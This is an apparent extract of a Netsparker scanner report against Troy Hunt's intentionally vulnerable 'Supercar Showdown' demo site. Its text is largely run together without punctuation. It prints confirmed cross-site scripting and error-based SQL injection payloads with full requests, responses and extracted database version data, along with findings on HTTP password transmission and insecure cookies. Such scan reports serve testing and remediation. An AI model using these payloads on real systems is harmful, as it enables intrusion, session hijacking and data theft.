External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
